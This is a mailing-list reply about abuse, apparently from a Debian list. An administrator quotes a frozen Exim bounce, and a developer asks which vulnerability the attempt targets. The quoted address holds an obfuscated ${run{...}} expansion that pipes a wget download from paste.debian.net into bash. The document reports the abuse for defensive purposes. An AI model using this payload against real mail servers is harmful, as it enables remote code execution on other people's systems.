[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Misuse/Abuse

Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
> To whom this may concern,
> I got a system message from my mailer daemon lately. It contains
> -------------------------------- cut --------------------------------
> Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
> The sender is <>.
> The following address(es) have yet to be delivered:
> ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
> \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
> h\x22}}@ianm-mang.math.kit.edu:
> Too many "Received" headers - suspected mail loop
> -------------------------------- cut --------------------------------
> I don't know if this messages reaches the right persons, but someone may
> forward it. You may at least remove the files which are accessible on
> paste.debian.net.

Clearly someone tries to run a command put as an address. Out of curiosity:
Which kind of vulnerability are they trying to use here?

Regards, Daniel
Daniel Leidert <dleidert@debian.org> | https://www.wgdd.de/
GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D
GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78

If you like my work consider sponsoring me via

Attachment: signature.asc
Description: This is a digitally signed message part

Reply to: